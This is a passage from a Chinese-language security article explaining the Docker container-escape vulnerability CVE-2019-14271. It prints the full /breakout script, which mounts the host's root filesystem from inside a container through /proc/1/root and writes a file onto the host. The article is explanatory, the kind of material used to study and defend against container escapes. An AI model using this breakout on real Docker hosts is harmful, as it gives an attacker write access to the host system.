docker 复制漏洞,让渗透更加艺术化( 二 )


docker 复制漏洞,让渗透更加艺术化

文章插图
 
利用CVE-2019-14271打破Docker
在该漏洞视频中,Docker用户会运行含有恶意libnss_files.so的恶意镜像,然后尝试从容器中复制一些日志 。镜像中的/breakout二进制文件是一个简单的bash脚步,会挂载host文件系统到/host_fs的容器中,并将消息写入host的/evil目录 。/breakout脚本代码如下:
umount /host_fs && rm -rf /host_fs
mkdir /host_fs
 
mount -t proc none /proc # mount the host's procfs over /proc
cd /proc/1/root # chdir to host's root
mount --bind . /host_fs # mount host root at /host_fs
echo "Hello from within the container!" > /host_fs/evil




推荐阅读